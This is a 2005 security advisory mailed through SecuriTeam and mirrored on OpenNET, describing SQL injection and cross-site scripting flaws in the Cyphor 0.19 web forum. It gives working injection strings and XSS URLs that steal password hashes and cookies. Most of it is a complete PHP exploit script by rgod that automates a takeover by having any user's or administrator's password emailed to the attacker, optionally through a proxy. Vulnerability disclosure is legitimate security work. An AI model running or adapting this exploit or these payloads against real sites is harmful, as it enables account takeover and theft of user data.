The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[UNIX] Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 10 Oct 2005 13:35:19 +0200
Subject: [UNIX] Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20051010123612.0888F58DA@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)
------------------------------------------------------------------------


SUMMARY

 <http://www.cynox.ch/cyphor/about.php>; Cyphor is "a configurable 
Webforum, which uses PHP4's session capabilities to authenticate users, 
the MySQL database system to store all its data in, and Cascading Style 
Sheets (CSS) to configure the "Look and Feel" of the forum. Only 
registered users can post messages, registered users are split up into 
normal users, moderators and administrators. Moderators and administrators 
can delete threads, administrators can change board settings, create new 
forums etc".

Multiple security vulnerabilities have been discovered in Cyphor that 
allow remote attackers to cause the program to execute arbitrary SQL 
statement and include arbitrary HTML and/or JavaScript into pages returned 
to users.

DETAILS

Vulnerable Systems:
 * Cyphor version 0.19

If PHP's magic quotes have been set to off a remote attacker can trigger 
numerous SQL injections:
SQL Injection in 'Forgot Password Interface':
The "Forgot your password?" feature allows you to send yourself a new 
administrator password, this by supplying an SQL injecting string into the 
information sent to the server:

email: [your_email]
nick: 'or'X'='X

This will trigger an email of the sorts of:
You have registered for a Cyphor forum (My Discussions). This is your 
confirmation.

Your username is: 'or'X'='X
Your password is: mixa-13b

Now you can go to administration panel, create/edit/delete 
forums/group/users, you can insert evil javascript code in terms of usage 
or welcome message.

SQL Injection newmsg.php:
To see table_prefix (usually "cyphor_") use the following request:
http://[target]/cyphor/newmsg.php?fid='

You can cause the server to return the administrator password hash by 
using the following URL:
http://[target]/[path]/newmsg.php?fid='' UNION SELECT nick, password, 
null, null FROM [table_prefix]users /*

(it is encrypted by crypt() function with username as key, one way ... but 
can try to brute force it)

Cross Site Scripting in newmsg.php:
The following URL will trigger an cross site scripting attack against 
users viewing the below link:
http://[target]/[path]/newmsg.php?fid='' UNION SELECT null, "< 
script>alert(document.cookie)< /script>", null, null/*

Cross Site Scripting in footer.php:
The following URL will trigger an cross site scripting attack against 
users viewing the below link:
http://[target]/[path]/include/footer.php?t_login=< 
script>alert(document.cookie)< /script>

Exploit:
< ?php
# --- cyphor019_xpl.php 7.36 08/10/2005 #
# #
# Cyphor 0.19 ( possibly prior versions) SQL injection / board takeover #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then #
# send yourself any user / admin password right now! #
# #
# Sun Tzu: "There are five ways of attacking with fire. The first is to 
burn #
# soldiers in their camp; the second is to burn stores; the third is to 
burn #
# baggage trains; the fourth is to burn arsenals and magazines; the fifth 
is #
# to hurl dropping fire amongst the opponent." #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'< html>< head>< title>Cyphor 0.19 SQL Injection/board takeover < 
/title>< meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> < style
type="text/css"> body { background-color:#111111; 
SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} 
option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 
{font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 
0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * 
{font-style:
normal !important} *{text-decoration: none !important} 
a:link,a:active,a:visited
{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: 
underline;
color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, 
sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, 
sans-serif;
font-weight:bold; font-style: italic;}-->< /style>< /head>< body>< p 
class="Stile6">
Cyphor 0.19 (possibly prior versions) SQL injection / board takeover < 
/p>< p
class="Stile6"> a script by rgod at < a href="http://rgod.altervista.org"
target="_blank"> http://rgod.altervista.org<; /a>< /p> < table 
width="84%">< tr> < td
width="43%">< form name="form1" method="post" 
action="'.$SERVER[PHP_SELF].'?path=
value&host=value&port=value&username=value&proxy=value&your_email=value"> 
< p>
< input type="text" name="host">< span class="Stile5"> hostname (ex: 
www.sitename.
com)< /span>< /p>< p>< input type="text" name="path">< span 
class="Stile5"> path (ex:
/cyphor/ or /forum/ or just /)< /span>< /p>< p>< input type="text" 
name="port">< span
class="Stile5"> specify a port other than 80 (default value)< /span>< /p>< 
p>< input
type="text" name="username">< span class="Stile5">user whom you want the 
password
,admin? ;) < /span> < /p> < p> < input type="text" name="your_email">< 
span
class="Stile5"> email where the password will be sent< /span> < /p> < p> < 
input
type="text" name="proxy">< span class="Stile5"> send exploit through an 
HTTP prox
y (ip:port) < /span>< /p>< p>< input type="submit" name="Submit" 
value="go!">< /p>
< /form>< /td>< /tr>< /table>< /body>< /html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '< table border="0">< tr>';
while ($ii < = strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
       $ji=0;
       $ci++;
       echo "< td> < /td>";
       for ($li=0; $li< =15; $li++)
           { echo "< td>".$headeri[$li+$ki]."< /td>";
              }
      $ki=$ki+16;
      echo "< /tr>< tr>";
      }
if (strlen($datai)==1) {echo "< td>0".$datai."< /td>";} else
{echo "< td>".$datai."< /td> ";}
$ii++;
$ji++;
}
for ($li=1; $li< =(16 - (strlen($headeri) % 16)+1); $li++)
           { echo "< td>&nbsp&nbsp< /td>";
            }

for ($li=$ci*16; $li< =strlen($headeri); $li++)
           { echo "< td>".$headeri[$li]."< /td>";
              }
echo "< /tr>< /table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket($packet)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
      {$ock=fsockopen(gethostbyname($host),$port);
      if (!$ock) { echo 'No response from '.htmlentities($host).'...';
            die;
            }}

       else
      {
      if (!eregi($proxy_regex,$proxy))
      {echo htmlentities($proxy).' -> not a valid proxy...';
       die;
      }
      $parts=explode(':',$proxy);
      echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...< br>';
      $ock=fsockopen($parts[0],$parts[1]);
      if (!$ock) { echo 'No response from proxy...';
            die;
            }
      }
fputs($ock,$packet);
if ($proxy=='')
 {

  $html='';
  while (!feof($ock))
   {
    $html.=fgets($ock);
   }
 }
else
 {
  $html='';
  while ((!feof($ock)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
  {
   $html.=fread($ock,1);
  }
 }
fclose($ock);
echo nl2br(htmlentities($html));
}

define('EMAIL_PREG', 
'#^[a-z0-9&\-_.\+]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+$#');
define('USER_PREG', '#^[A-Za-z0-9_\-]+$#');

if (($path< >'') and ($host< >'') and ($your_email< >'') and ($username< 
>''))
{
if (!preg_match(EMAIL_PREG, $your_email)) {echo '< br>Need a valid 
email...'; die;}
if (!preg_match(USER_PREG, $username)) {echo '< br>Need a valid 
username...'; die;}
 if ($port=='') {$port=80;}
 if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

#STEP 1 -> retrieve the table prefix...
$packet="GET ".$p."show.php?fid=' HTTP/1.0 \r\n";
$packet.="User-Agent: GetRight/4.5xx\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, */*\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacket($packet);

$temp=explode("SELECT * FROM ",$html);
$temp2=explode("forums WHERE",$temp[1]);
$table_prefix=trim($temp2[0]);

echo '< br> Table prefix ->'.htmlentities($table_prefix);
if ($table_prefix=='') {echo 'Exploit failed...'; die;}

#STEP 2 -> send yourself a new password...
$sql="') UNION SELECT * FROM ".$table_prefix."users WHERE 
nick='".$username."'/*";
$sql=urlencode($sql);
$data="email=".urlencode($your_email)."&nick=".$sql."&submit=Submit";
$packet="POST ".$p."lostpwd.php HTTP/1.1\r\n";
$packet.="Referer: http://".$host.":".$port.$path."lostpwd.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Internet Ninja x.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
if (eregi("New password sent.",$html)) {echo '< br>Exploit 
successful...check your email box...';}
                else {echo '< br>Exploit failed...';}
}
else
{ echo 'Fill in requested fields, optionally specify a proxy...'; }
?>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:retrogod@aliceposta.it.> 
rgod.
The original article can be found at:  
<http://rgod.altervista.org/cyphor019.html>; 
http://rgod.altervista.org/cyphor019.html




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру